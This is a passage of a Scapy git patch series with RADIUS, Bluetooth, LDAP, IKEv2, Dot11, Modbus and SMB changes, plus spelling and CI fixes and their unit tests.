RadiusAttr_Message_Authenticator) + assert x.attributes[0].value == bytes.fromhex("df430d94a4992ca0d38acf02a1fa94f0") + assert x.authenticator == bytes.fromhex("e0d5cf468ffdf714ed4a40aea1a5715f") + assert isinstance(x.attributes[1], RadiusAttr_Vendor_Specific) + chap2_error = x.attributes[1].value + assert isinstance(chap2_error, MS_CHAP_Error) + assert chap2_error.String == b'E=691 R=0 V=3' + assert bytes(x[Radius]) == b'\x03\x01\x00<\xe0\xd5\xcfF\x8f\xfd\xf7\x14\xedJ@\xae\xa1\xa5q_P\x12\xdfC\r\x94\xa4\x99,\xa0\xd3\x8a\xcf\x02\xa1\xfa\x94\xf0\x1a\x16\x00\x00\x017\x02\x10\x00E=691 R=0 V=3' + +test_am( + Radius_am, + Ether(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00\xad\xca\xd1@\x00@\x11ql\x7f\x00\x00\x01\x7f\x00\x00\x01\xe9\x1b\x07\x14\x00\x99\xfe\xac\x01\x01\x00\x91\xc0{%t\xdd\x8eQC\xda\x861\x11\xf9\xd0\xb2j\x04\x06\x7f\x00\x01\x01 \x07mynas\x01\x06user\x06\x06\x00\x00\x00\x01\x1a\x18\x00\x00\x017\x0b\x12\xd8\x07\xbf\x15N\xfb\x9a;\x0f\xd8\x14\x7f\xae\xe2\xe3e\x1a:\x00\x00\x017\x194\x00\x00\x8e\x8d\xe0\x81\x15]8\xb5j\x7f`\x14\xe0f]\xa6\x00\x00\x00\x00\x00\x00\x00\x00\x88\x07\xfb\xf9\x08H\xb5\x81\x87\xdc\x02\x90\x04\xb0\xaf\x11\x0c\x9a\rwQ\xd4\xcaiP\x12\x85\xfeMzd\xaf\x00\xaa\x12\xe2\x910\xea\xea\xb6\xf3'), + check_radius_mschap2_reply_fail, + secret="SECRET", + IDENTITIES={"user": "password"} +) diff --git a/test/scapy/layers/radius.uts b/test/scapy/layers/radius.uts index 7a428b3621c..7a39522af61 100644 --- a/test/scapy/layers/radius.uts +++ b/test/scapy/layers/radius.uts @@ -6,7 +6,7 @@ + RADIUS tests = IP/UDP/RADIUS - Build -s = raw(IP()/UDP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy")) +s = raw(IP(src="127.0.0.1", dst="127.0.0.1")/UDP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy")) s == b'E\x00\x007\x00\x01\x00\x00@\x11|\xb3\x7f\x00\x00\x01\x7f\x00\x00\x01\x07\x14\x07\x14\x00#U\xb3\x01\x00\x00\x1bscapy\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x07scapy' = IP/UDP/RADIUS - Dissection @@ -234,8 +234,20 @@ assert pkt.attributes[2].len == 18 assert pkt.attributes[3].type == 24 assert pkt.attributes[3].len == 18 -= RadiusAttr_User_Password += RadiusAttr_User_Password - Parse and Decrypt r = b'\x01\x00\x00\x1c0x10x20x30x40x50\x02\x08geheim' p = Radius(r) assert isinstance(p.attributes[0], RadiusAttr_User_Password) + +p = Ether(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00Z\x00\x8e\x00\x00@\x11|\x03\x7f\x00\x00\x01\x7f\x00\x00\x01\x9f<\x07\x14\x00F\xfeY\x01\xfb\x00>s0\x00\x13\x86x\xd7\x11\xc4\x9e\xe1=\xce&r\xa7V\xba\xf6\xf0LG') +assert pkt.summary() == "Ether / IP / UDP / RADIUS Access-Request (User:'user' MS-CHAP2)" + +pkt = Ether(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00Z\x00\x8e\x00\x00@\x11|\x03\x7f\x00\x00\x01\x7f\x00\x00\x01\x9f<\x07\x14\x00F\xfeY\x01\xfb\x00>s0\x00\x13\x86x\xd7\x11\xc4\x9e\xe1=\xce&r Date: Fri, 24 Jan 2025 11:46:24 +0100 Subject: [PATCH 1414/1632] codespell-new (#4645) --- .config/codespell_ignore.txt | 1 + scapy/contrib/diameter.py | 4 ++-- scapy/fields.py | 2 +- scapy/layers/smb2.py | 2 +- test/contrib/http2.uts | 6 +++--- 5 files changed, 8 insertions(+), 7 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index cfdb00d50f8..ab4d74bac68 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -1,3 +1,4 @@ +abd aci ans applikation diff --git a/scapy/contrib/diameter.py b/scapy/contrib/diameter.py index 1bf1502e2f0..b5110709e08 100644 --- a/scapy/contrib/diameter.py +++ b/scapy/contrib/diameter.py @@ -2527,8 +2527,8 @@ class AVP_10415_1259 (AVP_FL_V): 'val', None, { - 1: "Pre-emptive priority: ", - 2: "High priority: Lower than Pre-emptive priority", + 1: "Preemptive priority: ", + 2: "High priority: Lower than Preemptive priority", 3: "Normal priority: Normal level. Lower than High priority", 4: "Low priority: Lowest level priority", })] diff --git a/scapy/fields.py b/scapy/fields.py index a37a5df2659..be0eba74537 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -400,7 +400,7 @@ def any2i(self, pkt, x): # However, having i2h implemented (#2364), it changes the default # behavior and broke all packets that wrongly use two ConditionalField # with the same name. Those packets are the problem: they are wrongly - # built (they should either be re-using the same conditional field, or + # built (they should either be reusing the same conditional field, or # using a MultipleTypeField). # But I don't want to dive into fixing all of them just yet, # so for now, let's keep this this way, even though it's not correct. diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index bf4f7f7fb63..f154ca5be9c 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -4464,7 +4464,7 @@ class SMB2_IOCTL_RESP_GET_DFS_Referral(Packet): def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes # Note: Windows is smart and uses some sort of compression in the sense - # that it re-uses fields that are used several times across ReferralBuffer. + # that it reuses fields that are used several times across ReferralBuffer. # But we just do the dumb thing because it's 'easier', and do no compression. offsets = { # DFS_REFERRAL_ENTRY0 diff --git a/test/contrib/http2.uts b/test/contrib/http2.uts index 11cbcb827b5..3c195ccbe01 100644 --- a/test/contrib/http2.uts +++ b/test/contrib/http2.uts @@ -1438,7 +1438,7 @@ assert str(h[16]) == 'accept-encoding: gzip, deflate' assert expect_exception(KeyError, 'h2.HPackHdrTable()[h2.HPackHdrTable._static_entries_last_idx+1]') -= HTTP/2 HPackHdrTable : Addind Dynamic Entries without overflowing the table += HTTP/2 HPackHdrTable : Adding Dynamic Entries without overflowing the table ~ http2 hpack hpackhdrtable tbl = h2.HPackHdrTable(dynamic_table_max_size=1<<32, dynamic_table_cap_size=1<<32) @@ -1493,7 +1493,7 @@ assert tbl.get_idx_by_name('x-requested-by') == h2.HPackHdrTable._static_entries assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdrv2 assert tbl[h2.HPackHdrTable._static_entries_last_idx+3].value() == hdrv -= HTTP/2 HPackHdrTable : Addind already registered Dynamic Entries without overflowing the table += HTTP/2 HPackHdrTable : Adding already registered Dynamic Entries without overflowing the table ~ http2 hpack hpackhdrtable tbl = h2.HPackHdrTable(dynamic_table_max_size=1<<32, dynamic_table_cap_size=1<<32) @@ -1522,7 +1522,7 @@ assert tbl[h2.HPackHdrTable._static_entries_last_idx+1].value() == hdrv assert tbl[h2.HPackHdrTable._static_entries_last_idx+2].value() == hdr2v assert tbl[h2.HPackHdrTable._static_entries_last_idx+3].value() == hdrv -= HTTP/2 HPackHdrTable : Addind Dynamic Entries and overflowing the table += HTTP/2 HPackHdrTable : Adding Dynamic Entries and overflowing the table ~ http2 hpack hpackhdrtable tbl = h2.HPackHdrTable(dynamic_table_max_size=80, dynamic_table_cap_size=80) From 3cbb62e04637f686867f9693275c14be938a229f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 24 Jan 2025 12:33:07 +0100 Subject: [PATCH 1415/1632] radiusd: add mschapv2 domain (#4644) --- scapy/layers/radius.py | 25 +++++++++++++++++++------ 1 file changed, 19 insertions(+), 6 deletions(-) diff --git a/scapy/layers/radius.py b/scapy/layers/radius.py index bdbf7537656..45bdccbdd5a 100644 --- a/scapy/layers/radius.py +++ b/scapy/layers/radius.py @@ -1528,6 +1528,7 @@ def parse_options(self, IDENTITIES=None, IDENTITIES_MSCHAPv2=None, servicetype=None, + mschapdomain=None, extra_attributes=[]): """ This provides a tiny RADIUS daemon that answers Access-Request messages. @@ -1545,10 +1546,12 @@ def parse_options(self, {"username": b"HashNT"}. The HashNT can be obtained using MD4le(). If IDENTITIES is provided, this will be calculated. :param servicetype: the Service-Type to answer. + :param mschapdomain: the MS-CHAP-DOMAIN to answer if MS-CHAP* is used. :param extra_attributes: a list of extra Radius attributes """ self.secret = bytes_encode(secret) self.servicetype = servicetype + self.mschapdomain = mschapdomain self.extra_attributes = extra_attributes if not IDENTITIES: IDENTITIES = {} @@ -1678,17 +1681,27 @@ def make_reply(self, req): AuthenticatorChallenge, UserName, ) - succ = MS_CHAP2_Success( - Ident=response.Ident, - String="S=%s" % auth_string.hex().upper() - ) rad.attributes.append( RadiusAttr_Vendor_Specific( vendor_id=311, - vendor_type=26, - value=succ, + vendor_type="MS-CHAP2-Success", + value=MS_CHAP2_Success( + Ident=response.Ident, + String="S=%s" % auth_string.hex().upper() + ) ) ) + if self.mschapdomain is not None: + rad.attributes.append( + RadiusAttr_Vendor_Specific( + vendor_id=311, + vendor_type="MS-CHAP-Domain", + value=MS_CHAP_Domain( + Ident=response.Ident, + String=self.mschapdomain, + ) + ) + ) else: raise Scapy_Exception( "Authentication method not provided or unsupported !" From f998c633da830824d60c249741f41876815219a5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 31 Jan 2025 21:39:22 +0100 Subject: [PATCH 1416/1632] Github actions: an unfinished job in a PR should be overwritten (#4648) --- .github/workflows/unittests.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index e8e86242545..6851466a56f 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -7,6 +7,11 @@ on: # The branches below must be a subset of the branches above branches: [master] +# https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/control-the-concurrency-of-workflows-and-jobs +concurrency: + group: ${{ github.workflow }}-${{ github.ref }} + cancel-in-progress: ${{ !contains(github.ref, 'master')}} + permissions: contents: read From 0f2b394a10eae110554d20104e51da048c955701 Mon Sep 17 00:00:00 2001 From: Satveer Brar Date: Sun, 2 Feb 2025 19:44:36 -0500 Subject: [PATCH 1417/1632] Change ID field to use little-endian byte order (#4629) * Change ID field to use little-endian byte order * Add unit tests to verify encoding and decoding of Dot11 ID field --- scapy/layers/dot11.py | 2 +- test/scapy/layers/dot11.uts | 9 +++++++++ 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 7dd563885b6..96cf6619847 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -730,7 +730,7 @@ class Dot11(Packet): ["next_tbtt", "comp_ssid", "ano"]), lambda pkt: (pkt.type, pkt.subtype) == (3, 1) ), - ShortField("ID", 0), + LEShortField("ID", 0), _Dot11MacField("addr1", ETHER_ANY, 1), ConditionalField( _Dot11MacField("addr2", ETHER_ANY, 2), diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index b1c81931724..0640980633d 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -18,6 +18,11 @@ len(dpl_ether) == 1 and Ether in dpl_ether[0] s = raw(Dot11()) s == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +pkt = Dot11(ID=0x1205) +raw_data = raw(pkt) +expected = b'\x05\x12' +assert raw_data[2:4] == b'\x05\x12', f"Encoded Dot11 ID field is {raw_data[2:4]}, expected {repr(expected)}." + = Dot11 - dissection p = Dot11(s) Dot11 in p and p.addr3 == "00:00:00:00:00:00" @@ -26,6 +31,10 @@ assert "DA" in p.address_meaning(1) assert "SA" in p.address_meaning(2) assert "BSSID" in p.address_meaning(3) +pkt = b'\x00\x00\x05\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +decoded_pkt = Dot11(pkt) +assert decoded_pkt.ID == 0x1205, f"Decoded Dot11 ID field is {hex(decoded_pkt.ID)}, expected 0x1205." + = Dot11QoS - build s = raw(Dot11()/Dot11QoS(Ack_Policy=1)) assert s == b'\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00' From 8eec6e8f40291dd4372f556e0be33565c12e2dc4 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 3 Feb 2025 01:46:02 +0100 Subject: [PATCH 1418/1632] Set threaded to False by default in sr1. (#4641) * Proposal: Set threaded to False in sr1. If the user doesn't specifiy threaded, we should set it to False in sr1 to eliminate the overhead of a thread creation * Apply feedback --- scapy/supersocket.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 592c581d41f..9744fd841bf 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -250,6 +250,10 @@ def sr1(self, *args, **kargs): """Send one packet and receive one answer """ from scapy import sendrecv + # if not explicitly specified by the user, + # set threaded to False in sr1 to remove the overhead + # for a Thread creation + kargs.setdefault("threaded", False) ans = sendrecv.sndrcv(self, *args, **kargs)[0] # type: SndRcvList if len(ans) > 0: pkt = ans[0][1] # type: Packet From a4c6e262c923efaf3f5b53a1fdb70064021e27c4 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Mon, 3 Feb 2025 02:06:05 +0100 Subject: [PATCH 1419/1632] bluetooth: Add new LE Meta subtype descriptions (#4622) --- scapy/layers/bluetooth.py | 26 ++++++++++++++++++-------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 60e7b37f5ee..59e6cfc8529 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -2377,10 +2377,20 @@ class HCI_Event_LE_Meta(Packet): """ name = "HCI_LE_Meta" fields_desc = [ByteEnumField("event", 0, { - 1: "connection_complete", - 2: "advertising_report", - 3: "connection_update_complete", - 5: "long_term_key_request", + 0x01: "connection_complete", + 0x02: "advertising_report", + 0x03: "connection_update_complete", + 0x04: "read_remote_features_page_0_complete", + 0x05: "long_term_key_request", + 0x06: "remote_connection_parameter_request", + 0x07: "data_length_change", + 0x08: "read_local_p256_public_key_complete", + 0x09: "generate_dhkey_complete", + 0x0a: "enhanced_connection_complete_v1", + 0x0b: "directed_advertising_report", + 0x0c: "phy_update_complete", + 0x0d: "extended_advertising_report", + 0x29: "enhanced_connection_complete_v2" }), ] def answers(self, other): @@ -2622,10 +2632,10 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_Read_BD_Addr, opcode=0x1009) # noqa: E501 bind_layers(HCI_Event_Command_Complete, HCI_Cmd_Complete_LE_Read_White_List_Size, opcode=0x200f) # noqa: E501 -bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Connection_Complete, event=1) -bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Advertising_Reports, event=2) -bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Connection_Update_Complete, event=3) -bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Long_Term_Key_Request, event=5) +bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Connection_Complete, event=0x01) +bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Advertising_Reports, event=0x02) +bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Connection_Update_Complete, event=0x03) +bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Long_Term_Key_Request, event=0x05) bind_layers(EIR_Hdr, EIR_Flags, type=0x01) bind_layers(EIR_Hdr, EIR_IncompleteList16BitServiceUUIDs, type=0x02) From cfc353228a969f07855fd3feda65bb5c5ae49931 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Mon, 3 Feb 2025 02:07:01 +0100 Subject: [PATCH 1420/1632] bluetooth: Add LE Bluetooth Device Address EIR (#4621) --- scapy/layers/bluetooth.py | 13 +++++++++++++ test/scapy/layers/bluetooth.uts | 6 ++++++ 2 files changed, 19 insertions(+) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 59e6cfc8529..4962babee10 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1270,6 +1270,18 @@ class EIR_AdvertisingInterval(EIR_Element): ] +class EIR_LEBluetoothDeviceAddress(EIR_Element): + name = "LE Bluetooth Device Address" + fields_desc = [ + XBitField('reserved', 0, 7, tot_size=-1), + BitEnumField('addr_type', 0, 1, end_tot_size=-1, enum={ + 0x0: 'Public', + 0x1: 'Random' + }), + LEMACField('bd_addr', None) + ] + + class EIR_Appearance(EIR_Element): name = "EIR_Appearance" fields_desc = [ @@ -2659,6 +2671,7 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(EIR_Hdr, EIR_PublicTargetAddress, type=0x17) bind_layers(EIR_Hdr, EIR_Appearance, type=0x19) bind_layers(EIR_Hdr, EIR_AdvertisingInterval, type=0x1a) +bind_layers(EIR_Hdr, EIR_LEBluetoothDeviceAddress, type=0x1b) bind_layers(EIR_Hdr, EIR_ServiceData32BitUUID, type=0x20) bind_layers(EIR_Hdr, EIR_ServiceData128BitUUID, type=0x21) bind_layers(EIR_Hdr, EIR_URI, type=0x24) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 6c719621d9d..9072aa1d31a 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -481,6 +481,12 @@ p = HCI_Event_Hdr(hex_bytes('3e23020100002e4961121110170201060f0954656c655361742 assert EIR_AdvertisingInterval in p assert p[EIR_AdvertisingInterval].advertising_interval == 400 += Parse EIR_LEBluetoothDeviceAddress +p = HCI_Event_Hdr(hex_bytes("3e2a02010000d93519d7ba4c1e0201020affc4000734151317fd80081b00d93519d7ba4c0303b9fe020ad4ad")) +assert EIR_LEBluetoothDeviceAddress in p +assert p[EIR_LEBluetoothDeviceAddress].addr_type == 0x0 +assert p[EIR_LEBluetoothDeviceAddress].bd_addr == '4c:ba:d7:19:35:d9' + = Parse EIR_Appearance p = BTLE(hex_bytes("d6be898e201660d4d3cebffb0201050319420c0303e7fe040948393850c27c")) assert EIR_Appearance in p From 5ed385e54526b566eef3df8f6feb2dc320455fe6 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Mon, 3 Feb 2025 02:08:22 +0100 Subject: [PATCH 1421/1632] bluetooth4LE: BTLE_ADV PDU_type enum typo fix (#4620) --- scapy/layers/bluetooth4LE.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index 0611d3edd26..be87e2bcde7 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -283,7 +283,7 @@ class BTLE_ADV(Packet): 2: "ADV_NONCONN_IND", 3: "SCAN_REQ", 4: "SCAN_RSP", - 5: "CONNECT_REQ", + 5: "CONNECT_IND", 6: "ADV_SCAN_IND"}), XByteField("Length", None), ] From a444240160baa1daa46b7fb825482100037ffa52 Mon Sep 17 00:00:00 2001 From: Satveer Brar Date: Sun, 2 Feb 2025 20:11:35 -0500 Subject: [PATCH 1422/1632] modbus: set registerVal max count to 123 (#4633) --- scapy/contrib/modbus.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/modbus.py b/scapy/contrib/modbus.py index 1b316807ed0..9e9cd2ed915 100644 --- a/scapy/contrib/modbus.py +++ b/scapy/contrib/modbus.py @@ -102,7 +102,8 @@ class ModbusPDU03ReadHoldingRegistersResponse(Packet): adjust=lambda pkt, x: x * 2), FieldListField("registerVal", [0x0000], ShortField("", 0x0000), - count_from=lambda pkt: pkt.byteCount)] + count_from=lambda pkt: pkt.byteCount, + max_count=123)] class ModbusPDU03ReadHoldingRegistersError(Packet): From e16a18ed761a89986a37222afcb0d5e102eca026 Mon Sep 17 00:00:00 2001 From: David Maciejak Date: Sun, 2 Feb 2025 20:13:02 -0500 Subject: [PATCH 1423/1632] Fix IKEv2 critical bit set (#4647) * Fix critical bit set Critical bit is set on the MSB * Add unit test --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/contrib/ikev2.py | 2 +- test/contrib/ikev2.uts | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 3bf12e65bff..b1ffd8cdc17 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -568,7 +568,7 @@ class IKEv2_Payload(_IKEv2_Packet): name = "IKEv2 Payload" fields_desc = [ ByteEnumField("next_payload", None, IKEv2PayloadTypes), - FlagsField("flags", 0, 8, ["critical"]), + FlagsField("flags", 0, 8, {0x80: "critical"}), ShortField("length", None), XStrLenField("load", "", length_from=lambda pkt: pkt.length - 4), ] diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index db503867fc1..9d51493daa1 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -28,8 +28,8 @@ a[IKEv2_Transform].show() = Build Ikev2 SA request packet -a = IKEv2(init_SPI="MySPI",exch_type=34)/IKEv2_SA(prop=IKEv2_Proposal()) -assert raw(a) == b'MySPI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00! "\x00\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x0c\x00\x00\x00\x08\x01\x01\x00\x00' +a = IKEv2(init_SPI="MySPI",exch_type=34)/IKEv2_SA(flags="critical", prop=IKEv2_Proposal()) +assert raw(a) == b'MySPI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00! "\x00\x00\x00\x00\x00\x00\x00\x00(\x00\x80\x00\x0c\x00\x00\x00\x08\x01\x01\x00\x00' = Build advanced IKEv2 From 8fef08364fe8e28f8ea96b94bf0dee3bb1400cda Mon Sep 17 00:00:00 2001 From: Vladimir Smirnov Date: Mon, 3 Feb 2025 10:25:08 +0100 Subject: [PATCH 1424/1632] Fix xdg folder permission check for cases when privileges were dropped (#4619) If privileges for scapy were dropped, but username remain unchanged, path.exist() would trigger an exception. Fix that by moving whole if statement under try-except. Fixes #4618 --- scapy/main.py | 21 +++++++++++---------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/scapy/main.py b/scapy/main.py index c5ad0c74d99..414bd46c1a2 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -68,17 +68,18 @@ def _probe_xdg_folder(var, default, *cf): # type: (str, str, *str) -> Optional[pathlib.Path] path = pathlib.Path(os.environ.get(var, default)) - if not path.exists(): - # ~ folder doesn't exist. Create according to spec - # https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html - # "If, when attempting to write a file, the destination directory is - # non-existent an attempt should be made to create it with permission 0700." - try: + try: + if not path.exists(): + # ~ folder doesn't exist. Create according to spec + # https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html + # "If, when attempting to write a file, the destination directory is + # non-existent an attempt should be made to create it with permission 0700." path.mkdir(mode=0o700, exist_ok=True) - except Exception: - # There is a gazillion ways this can fail. Most notably, - # a read-only fs. - return None + except Exception: + # There is a gazillion ways this can fail. Most notably, a read-only fs or no + # permissions to even check for folder to exist (e.x. privileges were dropped + # before scapy was started). + return None return path.joinpath(*cf).resolve() From b4dbb19789cdbef07510b506423a357c59985f99 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 3 Feb 2025 18:51:16 +0100 Subject: [PATCH 1425/1632] LDAP: add/modifydn (#4652) --- scapy/layers/ldap.py | 125 ++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 123 insertions(+), 2 deletions(-) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 3ad956e70db..43ee02347e7 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -99,7 +99,10 @@ # Typing imports from typing import ( + Any, + Dict, List, + Union, ) # Elements of protocol @@ -891,6 +894,29 @@ class LDAP_DelResponse(ASN1_Packet): ) +# Modify DN Operation +# https://datatracker.ietf.org/doc/html/rfc4511#section-4.9 + + +class LDAP_ModifyDNRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAPDN("entry", ""), + LDAPDN("newrdn", ""), + ASN1F_BOOLEAN("deleteoldrdn", ASN1_BOOLEAN(False)), + ASN1F_optional(LDAPDN("newSuperior", None, implicit_tag=0xA0)), + implicit_tag=ASN1_Class_LDAP.ModifyDNRequest, + ) + + +class LDAP_ModifyDNResponse(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + *LDAPResult, + implicit_tag=ASN1_Class_LDAP.ModifyDNResponse, + ) + + # Abandon Operation # https://datatracker.ietf.org/doc/html/rfc4511#section-4.11 @@ -1024,6 +1050,8 @@ class LDAP(ASN1_Packet): LDAP_AddResponse, LDAP_DelRequest, LDAP_DelResponse, + LDAP_ModifyDNRequest, + LDAP_ModifyDNResponse, LDAP_UnbindRequest, LDAP_ExtendedResponse, ), @@ -2128,7 +2156,7 @@ def search( attrsOnly=0, attributes: List[str] = [], controls: List[LDAP_Control] = [], - ): + ) -> Dict[str, List[Any]]: """ Perform a LDAP search. @@ -2189,7 +2217,12 @@ def search( resp.show() raise TimeoutError("Search timed out.") # Now, reassemble the results - _s = lambda x: x.decode(errors="backslashreplace") + + def _s(x): + try: + return x.decode() + except UnicodeDecodeError: + return x def _ssafe(x): if self._TEXT_REG.match(x): @@ -2272,6 +2305,94 @@ def modify( resp=resp, ) + def add( + self, + entry: str, + attributes: Union[Dict[str, List[Any]], List[ASN1_Packet]], + controls: List[LDAP_Control] = [], + ): + """ + Perform a LDAP add request. + + :param attributes: the attributes to add. We support two formats: + - a list of LDAP_Attribute (or LDAP_PartialAttribute) + - a dict following {attribute: [list of values]} + + :returns: + """ + # We handle the two cases in the type of attributes + if isinstance(attributes, dict): + attributes = [ + LDAP_Attribute( + type=ASN1_STRING(k), + values=[ + LDAP_AttributeValue( + value=ASN1_STRING(x), + ) + for x in v + ], + ) + for k, v in attributes.items() + ] + + resp = self.sr1( + LDAP_AddRequest( + entry=ASN1_STRING(entry), + attributes=attributes, + ), + controls=controls, + timeout=3, + ) + if LDAP_AddResponse not in resp.protocolOp or resp.protocolOp.resultCode != 0: + raise LDAP_Exception( + "LDAP add failed !", + resp=resp, + ) + + def modifydn( + self, + entry: str, + newdn: str, + deleteoldrdn=True, + controls: List[LDAP_Control] = [], + ): + """ + Perform a LDAP modify DN request. + + ..note:: This functions calculates the relative DN and superior required for + LDAP ModifyDN automatically. + + :param entry: the DN of the entry to rename. + :param newdn: the new FULL DN of the entry. + :returns: + """ + # RFC4511 sect 4.9 + # Calculate the newrdn (relative DN) and superior + newrdn, newSuperior = newdn.split(",", 1) + _, cur_superior = entry.split(",", 1) + # If the superior hasn't changed, don't update it. + if cur_superior == newSuperior: + newSuperior = None + # Send the request + resp = self.sr1( + LDAP_ModifyDNRequest( + entry=entry, + newrdn=newrdn, + newSuperior=newSuperior, + deleteoldrdn=deleteoldrdn, + ), + controls=controls, + timeout=3, + ) + if ( + LDAP_ModifyDNResponse not in resp.protocolOp + or resp.protocolOp.resultCode != 0 + ): + raise LDAP_Exception( + "LDAP modify failed !", + resp=resp, + ) + def close(self): if self.verb: print("X Connection closed\n") From f6ba322d04aa5e745e4ba85eb462a28ef39da1bd Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 3 Feb 2025 20:26:41 +0100 Subject: [PATCH 1426/1632] SMB: Implement encryption, cleanup RequireSignature (#4643) Signed-By: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- .config/codespell_ignore.txt | 1 + doc/scapy/layers/smb.rst | 17 +- doc/scapy/usage.rst | 5 + scapy/layers/ntlm.py | 5 +- scapy/layers/smb.py | 50 ++-- scapy/layers/smb2.py | 349 ++++++++++++++++++++++---- scapy/layers/smbclient.py | 107 +++++--- scapy/layers/smbserver.py | 159 +++++++++--- test/scapy/layers/smb2.uts | 3 +- test/scapy/layers/smbclientserver.uts | 69 ++++- 10 files changed, 622 insertions(+), 143 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index ab4d74bac68..7ed3f0caa78 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -8,6 +8,7 @@ browseable byteorder cace cas +ciph componet comversion cros diff --git a/doc/scapy/layers/smb.rst b/doc/scapy/layers/smb.rst index 0a271d60628..16261c69792 100644 --- a/doc/scapy/layers/smb.rst +++ b/doc/scapy/layers/smb.rst @@ -5,8 +5,6 @@ Scapy provides pretty good support for SMB 2/3 and very partial support of SMB1. You can use the :class:`~scapy.layers.smb2.SMB2_Header` to dissect or build SMB2/3, or :class:`~scapy.layers.smb.SMB_Header` for 